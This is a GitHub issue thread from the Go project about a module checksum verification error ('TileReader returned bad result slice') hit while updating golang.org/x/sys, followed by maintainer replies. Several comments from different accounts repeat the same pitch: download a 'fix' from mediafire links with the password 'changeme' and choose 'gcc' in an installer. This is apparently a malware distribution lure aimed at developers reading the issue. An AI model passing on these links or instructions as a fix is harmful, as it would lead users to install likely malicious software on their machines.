### ISSUE TITLE
cmd/go: verifying module checksum: TileReader returned bad result slice (tile/8/1/440 len=9, want 8192)

### ISSUE THREAD

**Issue by nape-max** [golang/go#69102]
### Go version

go version go1.22.5 darwin/arm64

### Output of `go env` in your module/workspace:

```shell
GO111MODULE=''
GOARCH='arm64'
GOBIN=''
GOCACHE='/Users/monapedenin/Library/Caches/go-build'
GOENV='/Users/monapedenin/Library/Application Support/go/env'
GOEXE=''
GOEXPERIMENT=''
GOFLAGS=''
GOHOSTARCH='arm64'
GOHOSTOS='darwin'
GOINSECURE=''
GOMODCACHE='/Users/monapedenin/go/pkg/mod'
GONOPROXY=''
GONOSUMDB='go.avito.ru'
GOOS='darwin'
GOPATH='/Users/monapedenin/go'
GOPRIVATE=''
GOROOT='/usr/local/go'
GOSUMDB='sum.golang.org'
GOTMPDIR=''
GOTOOLCHAIN='auto'
GOTOOLDIR='/usr/local/go/pkg/tool/darwin_arm64'
GOVCS=''
GOVERSION='go1.22.5'
GCCGO='gccgo'
AR='ar'
CC='clang'
CXX='clang++'
CGO_ENABLED='1'
GOWORK=''
CGO_CFLAGS='-O2 -g'
CGO_CPPFLAGS=''
CGO_CXXFLAGS='-O2 -g'
CGO_FFLAGS='-O2 -g'
CGO_LDFLAGS='-O2 -g'
PKG_CONFIG='pkg-config'
GOGCCFLAGS='-fPIC -arch arm64 -pthread -fno-caret-diagnostics -Qunused-arguments -fmessage-length=0 -ffile-prefix-map=/var/folders/bx/w_kp2qd57hx5tc3jz_f3y7w80000gn/T/go-build4157840375=/tmp/go-build -gno-record-gcc-switches -fno-common'
```

### What did you do?

Trying to update golang.org/x/sys to v0.24.0

### What did you see happen?

go: golang.org/x/sys@v0.24.0: verifying module: golang.org/x/sys@v0.24.0: checking tree#28892633 against tree#28919322: TileReader returned bad result slice (tile/8/1/440 len=9, want 8192)

### What did you expect to see?

No errors, just update

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by seankhliao** [comment]
cc @golang/sec

**Comment by seankhliao** [comment]
cc @golang/security

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by prattmic** [comment]
cc @matloob @samthanawalla

**Comment by matloob** [comment]
I I'd like to see if we could get some more information so we could reproduce:

Which module are you running this in? Is it publicly available? What's the command you ran?
